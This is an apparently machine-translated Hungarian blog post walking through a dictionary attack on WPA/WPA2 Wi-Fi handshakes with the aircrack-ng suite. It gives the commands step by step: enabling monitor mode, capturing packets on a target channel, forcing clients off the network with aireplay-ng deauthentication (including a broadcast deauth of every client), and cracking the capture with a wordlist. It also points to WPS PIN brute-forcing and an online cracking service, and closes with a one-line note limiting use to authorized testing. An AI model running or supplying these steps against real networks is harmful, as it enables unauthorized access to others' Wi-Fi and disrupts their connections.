keresés

ha azt tervezi, hogy pentest a WPA/WPA2 hálózat (nem WPS), van két szó az Ön számára: jó. Szerencse.

a behatolási tesztekkel végzett kísérleteim során a WPA/WPA2 kézfogások elleni szótári támadásokat találtam a leginkább idegesítő és hiábavaló gyakorlatoknak. Ez azért van, mert:

  • megy keresztül minden szót egy szótárban tartalmazó fájl több millió szó időigényes.
  • a siker nem garantált (előfordulhat, hogy a jelszó nem szerepel a szótárban).

Az Indiai kísérleteim során a WiFi jelszavak általában Hindi és angol szavak vagy Hindu név kombinációi, amelyek természetesen nem szerepelnek egyetlen szótárban sem, amelyet letöltök, függetlenül attól, hogy mennyire kimerítőnek ígérkezik.

ha még mindig elég bátor vagy ahhoz, hogy megpróbálj egy szótár támadást a WPA kézfogás ellen, itt van az eljárás.

frissítés: én is írt egy videót arról, hogyan capture and crack a WPA hanshake Az én YouTube-csatorna.

Hogyan indítsunk el egy szótár támadást a WPA kézfogás ellen

lehet, hogy szerencsénk lesz, és a legközelebbi WiFi jelszó egy közös szótárszóra vagy számsorra épülhet. Ebben az esetben előfordulhat, hogy sikerül egy szótár támadás.

1.lépés: monitor mód engedélyezése vezeték nélküli interfészen

airmon-ng start wlan0

ez elindítja a monitor módot.

2.lépés: Vegye figyelembe a legközelebbi WiFi hálózatokat.

airodump-ng mon0

3.lépés: jegyezze fel a célhálózat csatornáját, dump csomagokat arról a csatornáról, és mentse őket egy helyi rögzítési fájlba.

airodump-ng -c6 mon0 -w capture_file

4. lépés: Várjon WPA handshake capture

ezen a ponton az ‘aireplay-ng’ használatával törölheti a társított legitim klienst a hálózatról. A lényeg az, hogy amint hamarosan újra hitelesíti, elfogjuk a kézfogást anélkül, hogy túl sokáig kellene várnunk:

aireplay-ng --deauth 0 -a <AP\_MAC> -c <CLIENT\_MAC> mon0

ha nem ismeri egyetlen társított ügyfél MAC-jét sem, egyszerűen ‘broadcast’ a ‘deauth’ minden ügyfélnek:

aireplay-ng --deauth 0 -a <AP\_MAC> mon0

Lépés 5: Miután megragad egy WPA kézfogás jön a kemény része brute kényszerítve egy szótárban. Ehhez használja az ‘aircrack-ng’ – t:

aircrack-ng capture\_file-01.cap -w /media/Pranshu/...../dic/dark0de.lst

most mondd el imáidat, és remélem, hogy a jelszó megtalálható a választott szótárban.

Ön is használja az online elosztott WPA / WPA2 kézfogás repedés eszköz ezen a honlapon:

vegye figyelembe, hogy ha a hozzáférési pont WPS engedélyezve van, könnyebbé válik, hogy visszaszerezze a WPA / WPA2 jelmondatot, mint már csak 11.000 lehetséges kombinációk szükségesek, hogy brute force a WPS PIN miatt végrehajtási hiba.

jogi nyilatkozat: Ez csak kísérletezésre vagy engedélyezett behatolási tesztelésre szolgál.

Vélemény, hozzászólás?

Az e-mail-címet nem tesszük közzé.